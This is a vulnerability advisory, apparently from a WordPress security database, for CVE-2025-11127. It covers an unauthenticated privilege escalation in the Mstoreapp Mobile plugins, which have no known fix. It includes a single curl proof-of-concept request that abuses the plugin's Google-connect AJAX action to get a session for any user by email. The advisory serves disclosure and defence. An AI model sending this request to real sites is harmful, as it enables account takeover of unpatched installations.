Mstoreapp Mobile (App <= 2.08, Multivendor <= 9.0.1) – Unauthenticated Privilege Escalation | CVE 2025-11127

Description

The plugins do not properly verify users identify when using an AJAX action, allowing unauthenticated users to retrieve a valid session for arbitrary users by knowing their email address.

Proof of Concept

curl -X POST "http://example.com/wp-admin/admin-ajax.php?action=mstoreapp-google_connect" \
     -d "access_token=dummy&email=admin@example.com"

Affects Plugins

mstoreapp-mobile-app

No known fix

woo-mstoreapp-mobile-app

No known fix

References

CVE

CVE-2025-11127

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-287

CVSS

9.8 (critical)

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Verified

Yes

WPVDB ID

6432bd1a-6e44-4a3f-890b-df2bd877d626

Timeline

Publicly Published

2025-10-31 (about 2 months ago)

Added

2025-10-31 (about 2 months ago)

Last Updated

2025-10-31 (about 2 months ago)

Other

Published

Title

Published

2025-03-06

Title

WPCOM Member < 1.7.6 - Authentication Bypass via 'user_phone'

Published

2018-03-03

Title

Super Socializer < 7.11 - Authentication Bypass

Published

2016-04-28

Title

Google Authenticator <= 0.47 - Two Factor Authentication Bypass

Published

2023-07-18

Title

OAuth Single Sign On – SSO (OAuth Client) < 6.23.4 - Improper Authentication

Published

2023-11-24

Title

JobSearch WP Job Board < 2.3.4 - Authentication Bypass